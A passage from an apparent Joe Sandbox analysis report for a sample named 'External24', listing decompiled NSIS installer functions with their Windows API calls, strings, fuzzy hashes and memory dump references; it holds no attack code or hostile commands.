MulDiv.KERNEL32(0000EA00,00000064,0025D73F), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(005DDD90), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
open, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: 4bca6fec89df2a3c00238d33487dea971a2e25bd092853e9b0f1a4f132ecc0a8
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: 4bca6fec89df2a3c00238d33487dea971a2e25bd092853e9b0f1a4f132ecc0a8
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(005DDD90), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 32b726e26b700381ffe8aa5ae1edf5247499c74f350a30e98fa8f75bbb4b27b5
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 32b726e26b700381ffe8aa5ae1edf5247499c74f350a30e98fa8f75bbb4b27b5
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: dd3ef84afc0cc0632eea0b86570d3488e4467b064ffa7917fd3744fa5e7ec211
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: dd3ef84afc0cc0632eea0b86570d3488e4467b064ffa7917fd3744fa5e7ec211
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c76f5f67217ff8cf0e14f190a600bed5be082b9d327219379a7803d3a4dff88a
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: c76f5f67217ff8cf0e14f190a600bed5be082b9d327219379a7803d3a4dff88a
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 7b9cb23c877144097e2f496056e34d9dc46956987cc50be444b15727dea9268f
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 7b9cb23c877144097e2f496056e34d9dc46956987cc50be444b15727dea9268f
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
open, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042517C,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
